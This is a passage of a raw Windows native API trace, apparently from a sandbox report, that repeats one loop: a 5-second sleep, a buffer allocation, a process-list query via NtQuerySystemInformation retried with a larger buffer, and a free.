NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.500] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.513] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.527] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.627] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 